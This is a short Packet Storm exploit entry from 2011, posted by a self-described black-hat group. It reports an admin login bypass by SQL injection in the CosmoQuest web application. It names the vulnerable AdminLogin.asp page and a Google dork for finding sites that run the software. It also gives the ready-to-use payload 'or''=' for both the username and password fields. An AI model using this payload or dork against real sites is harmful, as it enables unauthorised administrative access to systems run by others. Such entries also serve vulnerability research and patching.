CosmoQuest SQL Injection

2011-03-30T00:00:00
ID PACKETSTORM:99889
Type packetstorm
Reporter Net.Edit0r
Modified 2011-03-30T00:00:00

Description

                                        
                                            `==========================================  
CosmoQuest bypass login page Vulnerability  
==========================================  
  
[~]######################################### InformatioN  
  
[~] Title : CosmoQuest bypass login page Vulnerability  
[~] Author : Net.Edit0r  
[~] Vendor or Software Link : http://www.cosmoquest.info/  
[~] Email : Black.hat.tm@gmail.com  
[~] Data : 2011-03-29  
[~] Google dork: "Powered by CosmoQuest"  
[~] Category: [Webapps]  
[~] Tested on: [Linux /php]  
  
[~]######################################### ExploiT  
  
[~] Vulnerable File :  
  
AdminLogin.asp  
  
[~] ExploiT :  
  
http://127.0.0.1/AdminLogin.asp  
  
user: 'or''='  
  
pass: 'or''='  
  
  
[~] ######################################### ThankS To ...  
  
[~] Black Hat Group Member :  
  
Net.Edit0r & DarkCoder & fronk & Amir-MaGic & H3x & Milad.C0nn3ct0r #BHG  
  
[~] IRANIAN Young HackerZ # Persian Gulf  
  
[~]######################################### FinisH :D  
  
`